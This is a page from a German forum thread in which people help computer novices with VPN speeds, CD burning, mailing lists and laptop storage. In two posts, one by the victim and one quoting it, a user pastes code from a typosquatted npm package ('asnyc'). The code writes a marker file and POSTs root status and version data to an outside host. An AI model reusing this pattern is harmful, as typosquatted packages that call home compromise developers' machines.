Du bist nicht eingeloggt! Möglicherweise kannst du deswegen nicht alles sehen.
  (Noch kein mods.de-Account? / Passwort vergessen?)
Zur Übersichtsseite
Hallo anonymer User.
Bitte logge dich ein
oder registriere dich!
 Moderiert von: Atomsk, Maestro, statixx, Teh Wizard of Aiz


 Thema: Informatiker helfen PC-Neulingen
« erste « vorherige 1 2 [3] 4 5 6 7 ... 30 nächste » letzte »
erste ungelesene Seite | letzter Beitrag 
Icefeldt

Arctic
 
Zitat von Pago

Tach.
Habe mir jetzt den Asus AC68U geholt, derzeit noch Vanilla und akt. Firmware.

Den Router nun als VPN-Client eingerichtet und wie erwartet, leider sehr starke Abstriche.
150Mbit bietet die Leitung.
Nativ: ~148Mbit.
VPN auf Rechner via TCP (App vom VPN-Anbieter): ~75MBit.
VPN auf Router via TCP (OpenVPN-Config, auf gleichen Server): ~26Mbit.

Mir ist schon klar, dass ich wohl bei weitem nicht die vollen 150Mbit je nutzen werde können, zudem es je nach Anwendungsfall nochmal unterschiedliche Server zu wählen gibt.
Aber so niedrig hätte ich es mir nicht erwartet.

Gibt es gute Empfehlungen/Tutorials/Settings, auch zB. nach Flash mit Merlin, welche paar mehr MBits rausquetschen?



Flash halt mal MerlinWRT.
Ist ja in 2min erledigt.
Und in 2min wieder rückgängig gemacht


Wird vllt die CPU der Flaschenhals sein.
Bliebe nur ein fetteres Modell
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von Icefeldt am 06.05.2019 20:25]
06.05.2019 20:09:44 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Pago

tf2_spy.png
von 25 auf 35 geklettert .

Najo, bei Download auf 65%... also bisschen was nach oben gäbe es schon noch:


Aber ja, wird wohl daran liegen.
Danke.
[Dieser Beitrag wurde 2 mal editiert; zum letzten Mal von Pago am 06.05.2019 21:02]
06.05.2019 20:35:11 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dieselrakete

Arctic
Hallo, ich habe ein Problem.
Ich muss eine CD brennen und es funktioniert nicht. Ja wir haben 2019 und ich könnte die Scheiße auch einfach per Mail schicken, aber egal. Jetzt verbringe ich schon Stunden damit, weil es nicht klappt.
Eine docx soll auf eine CD. Mein Laptop erkennt die Rohlinge überhaupt nicht, am anderen laptop wird irgendwas gebrannt aber es ist nie was drauf. Das ist echter Hass. Als würde mal versuchen ohne Hände Kuchen zu essen.
Was muss ich tun?
CDBurnerXP und das windowseigene Ding funktionieren beide nicht.
06.05.2019 22:34:00 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
h0rosthecrate

Female Guerilla
 
Zitat von dieselrakete

Hallo, ich habe ein Problem.
Ich muss eine CD brennen und es funktioniert nicht. Ja wir haben 2019 und ich könnte die Scheiße auch einfach per Mail schicken, aber egal. Jetzt verbringe ich schon Stunden damit, weil es nicht klappt.
Eine docx soll auf eine CD. Mein Laptop erkennt die Rohlinge überhaupt nicht, am anderen laptop wird irgendwas gebrannt aber es ist nie was drauf. Das ist echter Hass. Als würde mal versuchen ohne Hände Kuchen zu essen.
Was muss ich tun?
CDBurnerXP und das windowseigene Ding funktionieren beide nicht.


Sorry schon mal, aber dein Verglich hingt:
"Als würde mal versuchen ohne Hände Kuchen zu essen."
Das geht wunderbar.
Du müsstest besser schreiben:
"Als würde mal versuchen ohne Mund Kuchen zu essen."

Ich brenne übrigens noch regelmäßig CDs und DVDs. Ich denke seit zwei Jahren diese Päckchen Rohling ist das letzte und dann muss ich immer doch noch mal bestellen. Aber zu deinem Problem kann ich leider nicht weiterhelfen weil ich die Dinger an einem Mac brenne. Toast habe ich vor 12 Jahren gekauft und das funktionier heute noch.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von h0rosthecrate am 06.05.2019 22:40]
06.05.2019 22:38:00 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
hitmiccs

AUP hitmiccs 21.09.2009
Beides interne CD-Laufwerke? Rohlinge können auch einfach kacke sein, da wird am Lebensende des Mediums "CD-RW" keine besonders hohe Qualität mehr produziert
06.05.2019 22:38:24 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Herr der Lage

AUP Herr der Lage 16.10.2014
 
Zitat von dieselrakete
CD brennen und es funktioniert nicht
Ja wir haben 2019



traurig

Breites Grinsen
06.05.2019 22:38:41 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Xerxes-3.0

AUP Xerxes-3.0 05.11.2018
Hast du in Windows dieses "ok,was jetzt hier in dem Ordner ist soll auch auf CD gebrannt werden" angeklickt?
Andere Rohlinge parat? Vielleicjt sind die ja mittlerweile über. peinlich/erstaunt

Brennen tut er aber schon, oder?
06.05.2019 22:39:52 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dieselrakete

Arctic
Also mein Laufwerk erkennt grade garnichts, auch keine richtigen DVD.
06.05.2019 22:40:23 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Xerxes-3.0

AUP Xerxes-3.0 05.11.2018
Laufwerk hinüber? Hatte ich auch mal nach x Jahren Nichtbenutzung.
06.05.2019 22:42:18 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dieselrakete

Arctic
könnte sein. wie gesagt, 2019, ich weiß nicht, wann ich das letzte mal ein optisches medium benutzt habe.

Da offenbar irgendwas kaputt ist und ich digitale Demenz verabscheue, fahre ich nun mit dem Auto zum anderen Rechner und werde die verhurte CD brennen.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von dieselrakete am 06.05.2019 22:49]
06.05.2019 22:43:59 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
kRush*

kRush*
etwas für sehr schlecht befinden
 
Zitat von dieselrakete

ich könnte die Scheiße auch einfach per Mail schicken


Hier hat's aufgehört zu computieren.
06.05.2019 23:38:05 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dieselrakete

Arctic
Das war eher so mein Gedanke zu dem Thema, ich kann es eben nicht, weil das Gegenüber eine CD FÜRS ARCHIV BRAUCHT.

Aber die Dokumentenvorlage, die ist digital abrufbar. Kopf gegen die Wand schlagen
06.05.2019 23:41:29 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Xerxes-3.0

AUP Xerxes-3.0 05.11.2018
Guckt da nochmal jemand drauf, ehe sie archiviert wird? peinlich/erstaunt

Im Studienseminar musste ich für eine Arbeit auch ne CD abgeben. Die konnten da aber nicht nochmal draufgucken, weil deren Rechner kein DVD-Laufwerk mehr haben. Und selbst wenn, hätten sie es nicht gedurft, weil keine Datenträger von extern abgeschlossen werden dürfen.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von Xerxes-3.0 am 06.05.2019 23:58]
06.05.2019 23:54:51 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
RushHour

rushhour
In unserer rudimentären Firmen-IT sind jetzt Rundmailadressen eingerichtet. Also „alle aus Abteilung 3 @firma.de“.

Leider ist es nun so, dass alle Antworten oder sogar automatische Antworten nun an alle im Verteiler gegen, nicht nur an den Absender.

Das ist Stulle und kann so nicht gemeint sein. Trotzdem hat weder die Verwaltung noch der externe Dienstleister über den das gemietet würde und der den Webspace verwaltet eine Idee wie das zu ändern wäre.

Das System ist ein Firmen 1&1 Konto über eine Agentur.


Bekannt? Kann man das ändern? Wie? alternativ: Workaround?
07.05.2019 7:38:58 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
kRush*

kRush*
...
Größtmögliche Liste mit dem Verantwortlichen als Teilnehmer finden, dort nach Ideen fragen, Problem löst sich innerhalb kürzester Zeit von selbst.
07.05.2019 7:45:59 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
luke_skywalker

Leet
 
Zitat von RushHour

Das System ist ein Firmen 1&1 Konto über eine Agentur.

Bekannt? Kann man das ändern? Wie? alternativ: Workaround?


Hatten wir bei meinem alten Nebenjob auch zwischenzeitlich mal. Da waren dann reguläre Mailadressen für soetwas eingerichtet worden, die stupide auch entsprechende Abwesenheitnachrichten an die festgelegten Adressaten weitergeleitet haben. Lag im Endeffekt daran, dass die regulären Mailadresse einfach eine Regel im Webmailer drin hatten, der jede empfangene Mail Weitergeleitet hat.

Als wir dann wieder auf das selbstgehostete & kostenlose OpenSource-Programm "Mailman" zurück umgestiegen sind, waren diese Probleme vorbei. Anscheinend kann Mailman die Thread-ID einer Mailkonversation & weitere Status erkennen und leitet entsprechende Abwesenheitnachrichten nicht weiter.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von luke_skywalker am 07.05.2019 8:50]
07.05.2019 8:49:48 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
SiAm

AUP SiAm 22.03.2011
Kann mir jemand einen einfachen und guten html-Email-Generator empfehlen, der mir in den Code nicht soviel Werbung reinpackt wie geht?
Geht um ein sehr(!) simples Email-Template (Logo, Footer, ...) ohne dass ich html-Kenntnisse besäße oder mir diese längerfristig draufschaffen wöllte.
07.05.2019 20:04:29 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
Kann mir jemand sagen ob und wie ich bei meinem Lenovo IdeaPad S130-11IGM die Festplatte erweitern kann? Ich finde keine Eindeutigen Infos dazu.

Aktuell hat er 64gb eMMC Speicher, hatte gehofft ich kann da noch was drauf packen.
07.05.2019 20:29:10 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
[P.A.R.K.]TNX

Deutscher BF
 
Zitat von dantoX

Kann mir jemand sagen ob und wie ich bei meinem Lenovo IdeaPad S130-11IGM die Festplatte erweitern kann? Ich finde keine Eindeutigen Infos dazu.

Aktuell hat er 64gb eMMC Speicher, hatte gehofft ich kann da noch was drauf packen.



https://download.lenovo.com/consumer/mobiles_pub/s130-11igm_s130-14igm_130s-11igm_130s-14igm_hmm_201807.pdf
07.05.2019 20:35:27 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
monischnucki

AUP monischnucki 06.06.2018
 
Zitat von SiAm

Kann mir jemand einen einfachen und guten html-Email-Generator empfehlen, der mir in den Code nicht soviel Werbung reinpackt wie geht?
Geht um ein sehr(!) simples Email-Template (Logo, Footer, ...) ohne dass ich html-Kenntnisse besäße oder mir diese längerfristig draufschaffen wöllte.



Im E-Mailprogramm eine Signatur erstellen, welche die gewünschte Formatierung hat?

HTML in Mails ist aber abzulehnen. Das ist ein Textmedium. Alles andere ist dämliche Folklore ohne Mehrwert.
07.05.2019 20:49:53 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
SiAm

AUP SiAm 22.03.2011
Ähm ja. Danke.
Ist aber keine Option.
07.05.2019 21:13:51 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
monischnucki

AUP monischnucki 06.06.2018
Ich formulier mal um. Die Signatur ist die komplette Mail.
Mit MfG und sehr geehrte Erdmännchen.
Wenn du dann den Text umtippst, ist dann bereits formatiert.
Steht eben

TEXT in der Mitte, dort dann den Inhalt tippen.
Dann sollte das immer die gewünschte Formatierung haben, und im Signatureditor kann man auch die Bilder (Firmenlogo, Iso9001, etc) reinpacken. Hier aber bitte darauf achten, dass die Bilder nicht A3 kleingezoomt sind, sondern wirklich nur paar Pixel.

Wobei ich von HTML-Mails auf die geantwortet wird schon den übelsten Schwachsinn gesehen habe. Es ist einfach nicht toll.
07.05.2019 21:20:31 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
kRush*

kRush*
...
Und nicht den Disclaimer vergessen, dass fehlgeleitet Mails zurückgeschickt werden müssen!
07.05.2019 21:22:37 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
SiAm

AUP SiAm 22.03.2011
Es geht (leider) um eine Software, die u.a. - aber nicht nur - automatisiert Emails versendet und diese Templates können in dieser Software nunmal nur als html angelegt und genutzt werden.
Find's auch affig, aber is halt so.
Deshalb ja eine sehr einfach gehaltene html-Version.
07.05.2019 21:25:53 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
monischnucki

AUP monischnucki 06.06.2018
Mail in eine TXT reintippen, diese in html umbenennen. Go for it.

Sollte prinzipiell aber auch mit Wordpad funktionieren, wenn man die Datei als HTML dann exportiert / oder umbenennt. Dann sind Schriftarten/Größen/Formatierungen mit drin. Würde ich mal probieren.

/

Notepad++ und Schriftformatierungen etc als Code von SelfHTML.de holen.
[Dieser Beitrag wurde 2 mal editiert; zum letzten Mal von monischnucki am 07.05.2019 21:29]
07.05.2019 21:27:36 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Slutti

AUP Slutti 08.05.2015
Böööh.
Ich glaube dass ich gehackt wurde.
Von einen Moment auf den anderen hat sich die Datei, an der ich gerade gearbeitet habe, geleert.
Paar Minuten später habe ich auf meiner Hauptpartition eine "pwn3d.txt" Datei gefunden, in der steht: "You are fully pwn3d due to a homobraphic error on your software dependancies"

ich habe die letzten Tage viel Kram über npm installiert zum rumexperimentieren.
fuck my life.
Und nu? D:
07.05.2019 23:53:59 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Slutti

AUP Slutti 08.05.2015
Habe die dependency gefunden, die die text datei erstellt hat.
Wie gefickt bin ich?
läuft da seit Wochen n Webserver mit root rechten auf meinem Rechner? Haare zu Berge stehen?
 
Code:
const http = require('http');
const fs = require('fs')

let is_sudo = false;

const isSudo = () =>
  new Promise((resolve, reject) => {
    fs.writeFile("/pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){
      if(err){
        fs.writeFile("pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){});
        resolve(false);
      } else {
        resolve(true);
      }
    })
})

const run = async() =>{
  const is_sudo = await isSudo()


  // console.log(await isSudo())

  let sender = "npm";
  let original_name = "async";
  let new_name = "asnyc";
  let version = process.version;

  let data = {
      "is_sudo": is_sudo? "True":"False",
      "sender": sender,
      "original_name": original_name,
      "new_name": new_name,
      "version": version
  }

  // data = JSON.stringify(data);
  var encoded = "";
  for(var prop in data) {
    encoded += prop + "=" + data[prop] + "&";
  }
  data = encoded.substring(0, encoded.length - 1) + "\n";

  var options = {
    host: 'homografo.junquera.xyz',
    port: 9999,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Content-Length': data.length
    }
  }

  var req = http.request(options);

  req.write(data);

  req.end();

}

run()



Mein niedriger IT IQ sagt, dass der nur n log gesendet hat und sonst nix gemacht haben kann, oder? peinlich/erstaunt
[Dieser Beitrag wurde 4 mal editiert; zum letzten Mal von Slutti am 08.05.2019 0:30]
08.05.2019 0:11:15 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
 
Zitat von [P.A.R.K.]TNX

 
Zitat von dantoX

Kann mir jemand sagen ob und wie ich bei meinem Lenovo IdeaPad S130-11IGM die Festplatte erweitern kann? Ich finde keine Eindeutigen Infos dazu.

Aktuell hat er 64gb eMMC Speicher, hatte gehofft ich kann da noch was drauf packen.



https://download.lenovo.com/consumer/mobiles_pub/s130-11igm_s130-14igm_130s-11igm_130s-14igm_hmm_201807.pdf



Danke. Habe eben versucht das Gehäuse zu öffnen. Der Deckel sitzt, nachdem alle Schrauben gelöst wurden, immer noch so fest, dass das irgendwie keinen Spaß macht. Mit viel Geduld und Fingerspitzengefühl bekomme ich das vielleicht hin, aber wahrscheinlich nicht ohne mir ne Macke ins Gehäuse zu hauen. Weiß nicht ob das überhaupt nötig ist:

Büße ich denn merklich an Geschwindigkeit ein, wenn ich anstatt einer SSD einfach eine 256GB Micro SD Karte der neusten Generation reinpacke?

Im Endeffekt will ich ja hauptsächlich ältere Spiele zocken (damit habe ich mir die Frage wahrscheinlich schon selbst beantwortet).
08.05.2019 0:22:34 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
-hi7.eM.hiGh-

-hi7.eM.hiGh-
Gehen tut es schon, könnte halt arsch langsam sein.

/insbesonders bei hohen rnd R&W zyklen.
[Dieser Beitrag wurde 2 mal editiert; zum letzten Mal von -hi7.eM.hiGh- am 08.05.2019 10:29]
08.05.2019 10:26:26 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
heutenoch

X-Mas Leet
 
Zitat von Slutti

Habe die dependency gefunden, die die text datei erstellt hat.
Wie gefickt bin ich?
läuft da seit Wochen n Webserver mit root rechten auf meinem Rechner? Haare zu Berge stehen?
 
Code:
const http = require('http');
const fs = require('fs')

let is_sudo = false;

const isSudo = () =>
  new Promise((resolve, reject) => {
    fs.writeFile("/pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){
      if(err){
        fs.writeFile("pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){});
        resolve(false);
      } else {
        resolve(true);
      }
    })
})

const run = async() =>{
  const is_sudo = await isSudo()


  // console.log(await isSudo())

  let sender = "npm";
  let original_name = "async";
  let new_name = "asnyc";
  let version = process.version;

  let data = {
      "is_sudo": is_sudo? "True":"False",
      "sender": sender,
      "original_name": original_name,
      "new_name": new_name,
      "version": version
  }

  // data = JSON.stringify(data);
  var encoded = "";
  for(var prop in data) {
    encoded += prop + "=" + data[prop] + "&";
  }
  data = encoded.substring(0, encoded.length - 1) + "\n";

  var options = {
    host: 'homografo.junquera.xyz',
    port: 9999,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Content-Length': data.length
    }
  }

  var req = http.request(options);

  req.write(data);

  req.end();

}

run()



Mein niedriger IT IQ sagt, dass der nur n log gesendet hat und sonst nix gemacht haben kann, oder? peinlich/erstaunt


Der Codeteil ist tatsächlich nur log senden method: 'POST',, der Code wartet auch drauf als sudo/root ausgeführt zu werden? Wie sehr du dich als gefickt betrachten kannst lässt sich schlecht sagen, aber besonders schlau hast du dich nicht angestellt Breites Grinsen
08.05.2019 10:39:57 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
 Thema: Informatiker helfen PC-Neulingen
« erste « vorherige 1 2 [3] 4 5 6 7 ... 30 nächste » letzte »

mods.de - Forum » Public Offtopic » 

Hop to:  

Mod-Aktionen:
25.04.2019 23:15:11 Atomsk hat diesem Thread das ModTag 'informatiker' angehängt.

| tech | impressum